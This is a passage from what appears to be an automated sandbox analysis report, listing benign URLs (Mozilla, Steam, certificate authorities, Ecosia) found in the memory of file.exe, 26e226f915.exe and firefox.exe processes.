Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDateurlclassifier.features.fingerprinting.whitelistTabl
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOuturlclassifier.features.cryptomining.annotate.
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRRhttp://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/insecureFallbackCould
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0urlclassifier.features.fingerprinting.blacklist
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1browser.safebrowsing.features.fingerprinting.an
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictorRollout
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slugextensions.webcompat.disabled_shims.Sp
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDuration
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollmentbrowser.safebrowsing.features.cryptomining.annotat
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabledhttp://mozilla.org/#/properties/qui
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranchhttp://mozilla.org/#/properties/localizations
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersionhttp://mozilla.org/#/properties/appNamehttp://mozilla.o
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAll
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slughttp://mozilla.org/#/properties/outcomeshttp://mozilla.org/#/pro
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/useNewWizard
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 0000001B.00000002.3300643832.0000017083E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083A4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3328273548.0000017085378000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3183980208.0000017085961000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3098920941.0000017083CD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3151203529.0000017085845000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3301585545.0000017083F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.0000017083903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3101001598.0000017080DCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3192896386.00000170859F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3098827298.0000017083CB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3204571257.00000170859D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3221206285.000001708BF69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.000001708440C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083A22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083AC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3293266018.000001708370C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3099368544.0000017083CCE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3099207221.0000017083CCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateBITS_IDLE_NO_PROGRESS_TIMEOUT_SECSBITS_ACTIVE_NO_PROGRESS_TIME
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001B.00000002.3303896282.0000017084364000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083A4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300092608.0000017083D06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3328273548.0000017085378000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303238080.0000017084239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001B.00000002.3303896282.00000170843A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3298702178.0000017083B62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3140375885.000001708537E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300092608.0000017083D8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300092608.0000017083DA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3302672534.00000170841C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3277613041.0000017081195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708310D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/browse
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulprivacy.trackingprotection.fingerprinti
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.caCACHE_EXPIRATION_TIME_PREF_NAME
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3280899223.0000017081FC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3255924567.000001E2F2600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.0000017083117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpifirefox-desktop
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpihttps://addo
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushedmatch
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956https://addons.
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgADD_EXTENSION_BUTTON_PRIVACY_1
